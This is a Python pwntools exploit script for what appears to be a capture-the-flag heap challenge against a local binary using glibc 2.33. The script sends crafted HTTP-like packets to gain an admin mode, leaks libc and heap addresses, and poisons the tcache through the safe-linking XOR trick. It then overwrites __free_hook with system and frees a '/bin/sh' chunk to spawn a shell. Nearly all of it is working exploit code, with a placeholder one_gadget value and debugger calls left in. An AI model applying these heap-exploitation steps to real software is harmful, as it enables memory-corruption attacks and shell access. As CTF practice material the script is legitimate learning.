1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
| from pwn import *
r=process('./pwn')
elf = ELF('./pwn')
libc= ELF('/home/dreamcat/glibc-all-in-one/libs/2.33-0ubuntu5_amd64/libc-2.33.so')
def getadmin():
payload = "DEV /root/src HTTP/1.1 \r\nrotartsinimda\x00 "
r.sendlineafter("Waiting Package...",payload)
def dbg():
gdb.attach(r)
pause(1)
def add(idx,size,text):
payload = b"POST /root/src HTTP/1.1 \r\n\x01&"
payload+= bytes(str(idx),encoding='utf-8')+b"&"
payload+= bytes(str(size),encoding='utf-8')+b"&"
payload+= text
r.sendlineafter("Waiting Package",payload)
def edit(idx,text):
payload = b"POST /root/src HTTP/1.1 \r\n\x02&"
payload+= bytes(str(idx),encoding='utf-8')+b"&"
payload+= text
r.sendlineafter("Waiting Package",payload)
def show(idx):
payload = b"POST /root/src HTTP/1.1 \r\n\x03&"
payload+= bytes(str(idx),encoding='utf-8')+b"&"
r.sendlineafter("Waiting Package",payload)
def free(idx):
payload = b"POST /root/src HTTP/1.1 \r\n\x04&"
payload+= bytes(str(idx),encoding='utf-8')+b"&"
r.sendlineafter("Waiting Package",payload)
gdb.attach(r,'b malloc')
getadmin()
add(0,0x420,b'a'*16)
add(1,0x60,b'a'*8)
add(3,0x60,b'a'*8)
free(0)
add(2,0x430,b'a'*8)
show(0)
r.recvuntil("Length: 6\n")
libc = u64(r.recvuntil('\x7f').ljust(8,b'\x00'))-0x1e0ff0
malloc_hook = libc+0x1e0b90
free_hook = 0x1e3e20+libc
realloc = libc + 0x097b20
system = libc + 0x4fa60
one_gadget = 0xcafebabedeadbeef
print("libc : ",hex(libc))
print("malloc_hook : ",hex(malloc_hook))
print("free_hook : ",hex(free_hook))
print("realloc : ",hex(realloc))
free(1)
show(1)
r.recvuntil("Content-Length: 5\n")
heap_addr1 = (u64(r.recvuntil(b"\n",drop = True).ljust(8,b'\x00'))<<12)+0x6d0
print("heap_addr1 : ",hex(heap_addr1))
heap_addr2 = heap_addr1+0x70
free(3)
payload = p64((heap_addr2>>12)^(free_hook-0x10))
edit(3,payload)
add(4,0x60,p64(one_gadget))
add(5,0x60,p64(0xaaaaaaaaaaaaaaaa)+p64(0xbbbbbbbbbbbbbbbb)+p64(system))
add(6,0x60,b'/bin/sh\x00')
free(6)
'''
free(3)
show(3)
r.recvuntil("Content-Length: 5\n")
heap_addr2 = (u64(r.recvuntil(b"\n",drop = True).ljust(8,b'\x00'))<<12)
print("heap_addr2 : ",hex(heap_addr2))
'''
'''
in glibc 2.33 tcache,
if we put a new chunk in tcachebin,
chunk->fd = ((chunk_user)>>12)^(last_freed_tcachechunk in this bin)
'''
r.interactive()
|
